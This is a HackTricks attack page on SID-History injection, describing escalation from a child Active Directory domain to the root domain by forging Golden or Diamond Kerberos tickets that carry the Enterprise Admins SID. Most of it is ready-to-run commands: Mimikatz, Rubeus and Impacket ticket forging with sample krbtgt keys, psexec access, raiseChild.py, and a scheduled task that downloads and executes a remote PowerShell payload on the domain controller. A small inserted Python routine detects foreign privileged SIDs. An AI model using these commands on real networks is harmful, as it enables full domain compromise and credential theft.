SID-History Injection
☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Attack
SID History was designed to support migration scenarios in which a user is moved from one domain to another. To preserve access to resources in the "old" domain, the user's previous SID is added to the SID History of the new account. Consequently, when forging such a ticket, the SID of a privileged group in the parent domain (EAs, DAs, etc.) can be added, which grants access to all resources in the parent domain.
This can be achieved with a Golden or a Diamond Ticket.
To find the SID of the "Enterprise Admins" group, take the SID of the root domain and append -519 to it: S-1-5-21-<root domain>-519. For example, from the root domain SID S-1-5-21-280534878-1496970234-700767426, the SID of the "Enterprise Admins" group is S-1-5-21-280534878-1496970234-700767426-519.
You can also use the Domain Admins group, whose SID ends in 512.
Another way to find the SID of other domain groups (e.g. "Domain Admins") is:
Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid
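The SID arithmetic described above (domain SID plus a well-known RID), together with the check a defender runs against it: flag any SID in an account's SID History or PAC ExtraSids that points at a privileged group of a domain other than the account's own. This is an added example, not HackTricks' own code; the two domain SIDs are the lab values quoted on this page, and the domain names, the account SID and the sample history are constructed.

```python
import re
from typing import Dict, List, Tuple

# Well-known RIDs of domain groups that should never appear in a SID History
# coming from a different domain than the account's own (assumption: this subset suffices).
PRIVILEGED_RIDS = {512: "Domain Admins", 516: "Domain Controllers",
                   518: "Schema Admins", 519: "Enterprise Admins"}

# A domain SID is S-1-5-21-<a>-<b>-<c>; a principal or group SID appends -<RID>.
_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+(?:-(\d+))?$")

# Constructed lab layout: root SID and child SID as quoted on this page.
DOMAINS = {"moneycorp.local": "S-1-5-21-280534878-1496970234-700767426",
           "dollarcorp.moneycorp.local": "S-1-5-21-1874506631-3219952063-538504511"}


def split_sid(sid: str) -> Tuple[str, int]:
    """Return (domain SID, RID); RID is -1 when the input is a bare domain SID."""
    m = _SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain-scoped SID: {sid}")
    if m.group(1) is None:
        return sid, -1
    return sid[: sid.rfind("-")], int(m.group(1))


def group_sid(domain_sid: str, rid: int) -> str:
    """Build a group SID the way the text does: root domain SID + '-519' for Enterprise Admins."""
    return f"{split_sid(domain_sid)[0]}-{rid}"


def flag_foreign_privileged_sids(account_sid: str, sid_history: List[str],
                                 domains: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (sid, owning domain, group) for each history entry that names a privileged
    group of a domain other than the one the account itself belongs to."""
    own_domain, _ = split_sid(account_sid)
    name_by_domain = {s: n for n, s in domains.items()}
    hits = []
    for sid in sid_history:
        dom, rid = split_sid(sid)
        if dom != own_domain and rid in PRIVILEGED_RIDS:
            hits.append((sid, name_by_domain.get(dom, "unknown domain"), PRIVILEGED_RIDS[rid]))
    return hits


def demo() -> List[Tuple[str, str, str]]:
    """Constructed case: a child-domain account carrying the root domain's EA SID."""
    child = DOMAINS["dollarcorp.moneycorp.local"]
    history = [f"{child}-1107",                                   # harmless: own-domain group
               group_sid(DOMAINS["moneycorp.local"], 513),        # foreign but unprivileged
               group_sid(DOMAINS["moneycorp.local"], 519)]        # injected Enterprise Admins SID
    return flag_foreign_privileged_sids(f"{child}-1105", history, DOMAINS)
```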
Golden ticket (Mimikatz) with KRBTGT-AES256
{% code overflow="wrap" %}
mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"
# /user is the username to impersonate (could be anything)
# /domain is the current domain.
# /sid is the current domain SID.
# /sids is the SID of the target group to add ourselves to.
# /aes256 is the AES256 key of the current domain's krbtgt account.
# --> You could also use /krbtgt:<NTLM hash of krbtgt> instead of the "/aes256" option
# /startoffset sets the start time of the ticket to 10 mins before the current time.
# /endin sets the ticket lifetime in minutes (600 = 10 hours).
# /renewmax sets how long (in minutes) the ticket can be valid for if renewed.
# The previous command will generate a file called ticket.kirbi
# Just by loading it you can perform a DCSync attack against the domain
{% endcode %}
For more information about golden tickets, check:
{% content-ref url="golden-ticket.md" %} golden-ticket.md {% endcontent-ref %}
Diamond ticket (Rubeus + KRBTGT-AES256)
{% code overflow="wrap" %}
# Use the /sids param
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap
# Or a ptt with a golden ticket
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<parent_domain_sid>-519 /user:Administrator /ptt
# You can use "Administrator" as username or any other string
{% endcode %}
For more information about diamond tickets, check:
{% content-ref url="diamond-ticket.md" %} diamond-ticket.md {% endcontent-ref %}
{% code overflow="wrap" %}
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$
{% endcode %}
Escalate to DA of the root domain, or to Enterprise Admin, using the KRBTGT hash of the compromised domain:
{% code overflow="wrap" %}
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local
schtasks /create /S mcorp-dc.moneycorp.local /SC WEEKLY /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
{% endcode %}
With the privileges obtained through the attack you can, for example, perform a DCSync attack in the new domain:
{% content-ref url="dcsync.md" %} dcsync.md {% endcontent-ref %}
From Linux
Manual with ticketer.py
{% code overflow="wrap" %}
# This is for an attack from child to root domain
# Get child domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep "Domain SID"
# Get root domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep -B20 "Enterprise Admins" | grep "Domain SID"
# Generate golden ticket
ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator
# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING
# JUST USE THE SAME USERNAME IN THE NEXT STEPS
# Load ticket (ticketer.py writes it as <username>.ccache)
export KRB5CCNAME=Administrator.ccache
# psexec in domain controller of root
psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10
{% endcode %}
Automated with raiseChild.py
This is an Impacket script that automates privilege escalation from a child domain to the parent domain. The script requires:
- The target domain controller
- Credentials of an administrative user in the child domain
The flow is as follows:
- Obtains the SID of the Enterprise Admins group of the parent domain
- Retrieves the hash of the KRBTGT account in the child domain
- Creates a Golden Ticket
- Logs in to the parent domain
- Retrieves the credentials of the Administrator account in the parent domain
- If the target-exec switch is specified, authenticates to the parent domain's domain controller via Psexec
raiseChild.py -target-exec 10.10.10.10 <child_domain>/username